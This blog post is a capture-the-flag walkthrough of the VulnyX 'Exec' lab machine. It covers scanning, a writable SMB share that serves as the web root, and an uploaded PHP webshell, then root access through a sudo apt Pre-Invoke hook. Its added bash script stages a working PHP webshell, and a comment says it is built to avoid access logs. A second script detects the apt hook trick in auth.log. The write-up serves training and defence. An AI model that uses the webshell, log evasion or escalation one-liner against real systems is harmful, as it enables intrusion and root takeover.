vulnyx-Exec

Exec

Target information:

OS: Linux
Creator: s3cur4
Difficulty: Low
Release: 15 Apr 2024

Information gathering

IP: 192.168.56.106

arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:13:58:9c, IPv4: 192.168.56.103
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:16 (Unknown: locally administered)
192.168.56.100 08:00:27:d3:cc:65 PCS Systemtechnik GmbH
192.168.56.106 08:00:27:a9:a6:75 PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.387 seconds (107.25 hosts/sec). 3 responded
nmap -sV -sC -Pn 192.168.56.106
Starting Nmap 7.94 ( https://nmap.org ) at 2024-10-21 01:33 CST
Nmap scan report for bogon (192.168.56.106)
Host is up (0.0015s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_ 256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp open http Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
MAC Address: 08:00:27:A9:A6:75 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: EXEC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: -2s
| smb2-time:
| date: 2024-10-20T17:33:42
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.94 seconds

Ports 22, 80, 139 and 445 are open. Opening port 80 in a browser shows a web page, but it is only the Apache default page and is of no use by itself.

Scanning the site for content turned up nothing useful either.

Next is the Samba service. It accepts a connection with an empty password and lists its shares:

smbclient -L 192.168.56.106
Password for [WORKGROUP\kali]:

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
server Disk Developer Directory
IPC$ IPC IPC Service (Samba 4.17.12-Debian)
nobody Disk Home Directories
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

Next, upload a file to the server share and check whether it can be fetched from the web server. The share already holds an index.html of 10701 bytes, the size of the Debian Apache default page, which suggests it is the document root:

smbclient //192.168.56.106/server
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Apr 15 16:45:54 2024
.. D 0 Mon Apr 15 16:04:12 2024
index.html N 10701 Mon Apr 15 16:04:31 2024

19480400 blocks of size 1024. 16496884 blocks available
smb: \> put 111.txt
putting file 111.txt as \111.txt (5.4 kb/s) (average 5.4 kb/s)
smb: \>


Uploaded files are served over HTTP, so the next step is a webshell. A quick test shows the server executes PHP, so the webshell has to be a PHP file.

Upload the PHP webshell and call it.
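As an added example (not code from the original write-up), the following bash script automates what the steps above do by hand: it filters an smbclient -L listing down to the Disk shares worth a write attempt, uploads a canary file over SMB, fetches it back over HTTP to confirm the share really is the document root, and only then stages a small PHP webshell. The target address, the share name server, null-session access and the file names are assumptions taken from this write-up; the listing embedded in the script is a constructed copy of the one shown above.

```bash
#!/usr/bin/env bash
# Added example, not part of the original write-up.
# Confirms that a writable SMB share is the Apache document root before
# dropping a PHP webshell into it. Target, share name and null-session
# access are assumptions taken from the write-up.
TARGET="${TARGET:-192.168.56.106}"
SHARE="${SHARE:-server}"

# Constructed copy of the `smbclient -L` listing shown above.
SAMPLE_SHARE_LIST='
	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	server          Disk      Developer Directory
	IPC$            IPC       IPC Service (Samba 4.17.12-Debian)
	nobody          Disk      Home Directories
Reconnecting with SMB1 for workgroup listing.
'

# Keep only Disk shares worth a write attempt; print$ and IPC$ never hold web content.
candidate_shares() {
    awk '$2 == "Disk" && $1 != "print$" { print $1 }'
}

# 32 hex characters used as canary file name and content, so it cannot collide with real files.
new_token() {
    head -c 16 /dev/urandom | od -An -tx1 | tr -d ' \n'
}

# Source of a minimal PHP webshell. The command arrives in a POST body so it
# does not end up in Apache's access log the way a GET parameter would.
webshell_source() {
    cat <<'EOF'
<?php
if (isset($_POST['cmd'])) {
    header('Content-Type: text/plain');
    echo shell_exec($_POST['cmd'] . ' 2>&1');
}
EOF
}

# Upload a canary over SMB and fetch it over HTTP.
# Returns 0 if the share is served by the web server, 1 if the upload worked
# but the file is not served, 2 if SMB refused the write.
share_is_webroot() {
    local token tmp rc=1
    token=$(new_token)
    tmp=$(mktemp -d)
    printf '%s\n' "$token" > "$tmp/$token.txt"
    if ! smbclient "//$TARGET/$SHARE" -N -c "lcd $tmp; put $token.txt" >/dev/null 2>&1; then
        rm -rf "$tmp"
        return 2
    fi
    if curl -fs "http://$TARGET/$token.txt" | grep -q "$token"; then
        rc=0
    fi
    smbclient "//$TARGET/$SHARE" -N -c "del $token.txt" >/dev/null 2>&1   # clean up the canary
    rm -rf "$tmp"
    return $rc
}

# Write the webshell into the share and print the URL it will be served from.
stage_webshell() {
    local name="${1:-shell.php}" tmp
    tmp=$(mktemp -d)
    webshell_source > "$tmp/$name"
    smbclient "//$TARGET/$SHARE" -N -c "lcd $tmp; put $name" >/dev/null
    rm -rf "$tmp"
    echo "http://$TARGET/$name"
}

main() {
    echo "shares to try (from the captured listing):"
    printf '%s\n' "$SAMPLE_SHARE_LIST" | candidate_shares
    if share_is_webroot; then
        url=$(stage_webshell shell.php)
        curl -s --data-urlencode 'cmd=id' "$url"   # runs id as the web server user
    else
        echo "share $SHARE is writable but not served over HTTP" >&2
    fi
}

# Network actions only run on request; sourcing the file just defines the functions.
if [ "${RUN_EXPLOIT:-0}" = 1 ]; then main; fi
```

Run it with RUN_EXPLOIT=1 against the lab target; the canary step is what separates "the share is writable" from "the share is the web root", which is the finding that makes the upload dangerous.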

The webshell gives a shell, but only as www-data. Check /etc/passwd for other users:

cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
s3cur4:x:1000:1000:s3cur4:/home/s3cur4:/bin/bash

Privilege escalation

There is one more user, s3cur4, but no way to log in as that user directly. Poking around, www-data turned out to have sudo rights.

Running the escalation command through the webshell errors out, most likely because the webshell executes commands without a tty, so upload a reverse-shell script and do the escalation from an interactive shell instead.

Next, set up passwordless login: generate a key pair with ssh-keygen, copy the public key between the target and the attacker machine, and log in from the attacker machine as s3cur4 without a password.

Read user.txt.

Escalating to root

s3cur4 is allowed to run apt through sudo.

A search turns up the GTFOBins entry for apt: https://gtfobins.github.io/gtfobins/apt/

Run the following to escalate:

sudo apt update -o APT::Update::Pre-Invoke::=/bin/sh

APT::Update::Pre-Invoke is a hook that apt runs before the update itself, and because apt is running as root under sudo, the /bin/sh it spawns is a root shell.

That gives a root shell, and root.txt can be read.
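As an added example (not from the original write-up), the following bash snippet shows the other side of this step: sudo writes every command it runs to the auth log, so apt's hook options stand out if anyone looks. The log lines embedded in the script are constructed in sudo's syslog format and are not from the target.

```bash
#!/usr/bin/env bash
# Added example, not part of the original write-up: spotting the apt hook
# trick in sudo's log. sudo records each command it runs through syslog
# (auth.log on Debian) as
#   sudo:   <user> : TTY=... ; PWD=... ; USER=<target> ; COMMAND=<path and args>
# The lines below are constructed in that format; they are not from the target.
SAMPLE_AUTH_LOG='Oct 21 04:00:10 exec sudo:   s3cur4 : TTY=pts/0 ; PWD=/home/s3cur4 ; USER=root ; COMMAND=/usr/bin/apt update
Oct 21 04:00:55 exec sudo:   s3cur4 : TTY=pts/0 ; PWD=/home/s3cur4 ; USER=root ; COMMAND=/usr/bin/apt update -o APT::Update::Pre-Invoke::=/bin/sh
Oct 21 04:01:12 exec sudo:   s3cur4 : TTY=pts/0 ; PWD=/home/s3cur4 ; USER=root ; COMMAND=/usr/bin/apt-get install -o Dpkg::Pre-Install-Pkgs::=/bin/sh vim
Oct 21 04:02:03 exec sudo:   s3cur4 : TTY=pts/0 ; PWD=/home/s3cur4 ; USER=root ; COMMAND=/usr/bin/apt upgrade'

# apt configuration options that make apt execute an arbitrary command.
# Any of them passed with -o on a sudo'd apt command line is a root shell.
HOOK_OPTIONS='APT::Update::(Pre|Post)-Invoke|Dpkg::(Pre|Post)-Invoke|Dpkg::Pre-Install-Pkgs'

# Read log lines on stdin; print "<user> <command>" for each sudo'd apt/apt-get
# invocation that passes one of the hook options.
flag_apt_hooks() {
    grep -E "sudo: .* COMMAND=/usr/bin/apt(-get)? .*-o[ =]*($HOOK_OPTIONS)" \
    | sed -E 's/.*sudo: *([^ ]+) *:.*COMMAND=(.*)/\1 \2/'
}

# Run against the constructed sample. On a real host: flag_apt_hooks < /var/log/auth.log
printf '%s\n' "$SAMPLE_AUTH_LOG" | flag_apt_hooks
```

On the sudoers side, a rule that names /usr/bin/apt alone matches any arguments, which is what makes the -o trick possible; a rule that spells out the arguments (/usr/bin/apt update) forces an exact match and the hook option no longer fits. Even then, granting a package manager through sudo is hard to make safe, and the GTFOBins entry lists more than one way in.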


vulnyx-Exec
https://www.mrdang.icu/2024/10/21/vulnyx-Exec/
Author: Mr.Dang
Published: 21 October 2024